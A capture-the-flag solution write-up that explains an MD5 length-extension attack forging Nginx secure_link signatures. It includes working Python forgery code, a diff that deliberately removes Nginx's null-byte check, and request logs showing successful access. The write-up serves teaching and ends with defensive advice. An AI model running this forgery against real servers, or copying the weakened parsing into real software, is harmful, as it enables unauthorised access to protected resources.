Nginx Crypto Challenge's Solution


Overall Idea

This exercice mainly illustrates length-extension attacks and collision of inputs on Merkle-Damgård hash functions, for more details on this type of attack see the advisory document flickr_api_signature_forgery.pdf by Thai Duong and Juliano Rizzo along with the documents listed in their bibliography.

In this case, the main idea is to accomplish a length-extension attack by profiting from the fact that the secret is the first element hashed. Thus the attacker might operate on two elements, the URI and the timestamp (expiration date). The first possibility is to let the URI as it is and just modify the timestamp value by appending a new timestamp. While the value could overflow and might somehow be controlled there is however an element preventing this idea, it's the padding, the two timestamps would not really be juxtaposed there would be separated by non-numeric (invalid in the context of ngx_atotm() function) padding bytes. The second possible idea is to modify both fields, the URI would represent the concatenation of all fields previously hashed in the original hash including the original padding bytes, and the timestamp would be assigned a new choosen value. Thus, in this case the new fields would be:

uri   : /p/eve/restricted.txt1295613171padding
expire: 1658275195  # Year 2022

Therefore the password concatenated to the new URI would handle all the data previously hashed along with the correct padding, and the new expiration date would be just an update of the original hash value. However modifying the URI is not straigthforward as it changes the requested ressource, so it may not correspond to a valid ressource on the server, but in this case the following rewrite makes the target's ressource static, always redirecting to the file restricted.txt as long as the request is rightly authenticated.

rewrite ^ /p/restricted.txt break;

Building Blocks

The snippets of source code below are extracted from challenge.py which itself uses md5.py an implementation of MD5 in Python copied from the PyPy's project.

The main function md5_extend() takes as arguments the target host http://cc.dbzteam.org:9000, the original uri /p/eve/restricted.txt, the original secret hash aSYSRnsL0by4M1l1tbPcrQ generated for the timestamp 1295613171 and will try to generate a new valid request with a new choosen expiration date without knowledge of the server's secret. Because it doesn't know the length of the password, it has to generate different padding blocks until one matching the length of the password produces a valid request. This code tests for passwords of size comprised between 1 and 31 bytes. As soon as a request succeeds, by receiving a response code value of 200 it immediately read and return the content of the file.

def md5_extend(host, uri, base_hash, expire):
    new_expire = '1658275195'  # 2022
    base_new_uri = uri + expire
    base_new_uri_len = len(base_new_uri)
    hash_raw = md5_b64decode(base_hash)
    for i in range(1, 32):
        new_uri = base_new_uri + md5_padding(i + base_new_uri_len)
        req = host + urllib.quote(new_uri)
        extension = md5.MD5Type()
        md5_set_state(extension, hash_raw, (i >> 6) + 64)
        extension.update(new_expire)
        req += '?st=' + base64.urlsafe_b64encode(extension.digest()).strip('=')
        req += '&e=' + new_expire
        #print req
        urlobj = urllib.urlopen(req)
        if urlobj.getcode() == 200:
            return urlobj.read()

To build new requests, Eve must append new data next to the original. Therefore, the purpose of this function md5_set_state() is to recreate the final MD5 state from the input state a previously returned MD5 hash value. It does so by assigning the four variables A, B, C, D and by setting the current length to the estimated value data_len which is a multiple of 64. The goal is that after the call to this function the caller will be able to add new input data to hash just by calling the method md5.update(new_appended_data) this will eventually result in a hash of:

original_hashed_data || pad1 || new_appended_data || pad2 = rr43nn-gMTS_paYH/p/eve/restricted.txt1295613171 || pad1 || 1658275195 || pad2

Where 1658275195 will be the new expiration date choosen by Eve. Notice you won't really have to know the secret key to recreate this state nor for updating it with new data. All is needed is the previous hash value and the size of the hashed data.

def md5_set_state(md5obj, state, data_len):
    A, B, C, D = struct.unpack("<IIII", state)
    md5obj.A = A
    md5obj.B = B
    md5obj.C = C
    md5obj.D = D
    md5obj.count[0] = data_len << 3

This function md5_padding() is used to recreate the padding that was appended at the end of the original hashed fields key || uri || timestamp = rr43nn-gMTS_paYH/p/eve/restricted.txt1295613171 to round the input data to a multiple of its block size, i.e. 64 bytes, before being hashed. The exact length data_len of the input (without the padding) is required because its value in bits must be appended at the end of the last input block, just after the padding bytes. At exception of the first byte all others padding bytes are null bytes \x00. This function returns the padding.

def md5_padding(data_len):
    data_len = data_len << 3
    index = (data_len >> 3) & 0x3fL
    if index < 56:
        pad_len = 56 - index
    else:
        pad_len = 120 - index
    padding = '\x80' + '\x00' * 63
    bits = ''.join([chr((data_len >> (i * 8)) & 0xff) for i in range(8)])
    return padding[:pad_len] + bits

Server's modification

What separates this toy server from the real Nginx's implementation is the fact that it tolerates the presence of null-bytes characters %00 in the URI coming from the MD5 padding. It's not standard, therefore a good server implementation must prevent their use and it's precisely what Nginx does and what was artificially modified in order to make this challenge work. The modified source file is ngx_http_parse.c, see ngx_http_parse.c.diff. This is the unique modification made to the server.

--- ngx_http_parse.c.orig	2011-01-25 05:11:18.157809998 +0100
+++ ngx_http_parse.c	2011-01-25 05:11:35.225810002 +0100
@@ -1247,9 +1247,7 @@
                     ch = *p++;
                     break;

-                } else if (ch == '\0') {
-                    return NGX_HTTP_PARSE_INVALID_REQUEST;
-                  }
+                }

                 state = quoted_state;
                 break;

Putting it all together

Eve executes challenge.py with as arguments the original valid MD5 hash and the original timestamp value. This script stops as soon it receives a 200 response from the server.

python challenge.py aSYSRnsL0by4M1l1tbPcrQ 1295613171

Next lines represent a sample of requests handled by the server, each request corresponds to a guess on the password's length. The last one is the right one.

"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%00%00P%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%60%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00h%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00p%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00x%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 200
	

Following this last request, where Eve made a good guess and issued a valid request, Eve accessed the restricted file and was able to read it. It contains the number:

42

Wrapping up, security issues

  • The secure link module would be stronger using a real HMAC not one based on a custom hash construction
  • Another issue is the potential lack of entropy of the password/passphrase used to set-up the module. It would be worth considering deriving a key from the password and a salt using a password key derivation scheme such as PBKDF2 or scrypt
  • A non-related issue is the presence of a non constant-time hash comparison in ngx_http_secure_link_module.c, this may enable an attacker only knowing a valid URI to guess the secret hash value associated to a choosen expiration date, read the extensive work of Nate Lawson on the subject here, here and here
        ngx_md5_init(&md5);
        ngx_md5_update(&md5, val.data, val.len);
        ngx_md5_final(md5_buf, &md5);
    
        if (ngx_memcmp(hash_buf, md5_buf, 16) != 0) {
            goto not_found;
        }
    
    With ngx_memcmp() defined in ngx_string.h as:
    #define ngx_memcmp(s1, s2, n)  memcmp((const char *) s1, (const char *) s2, n)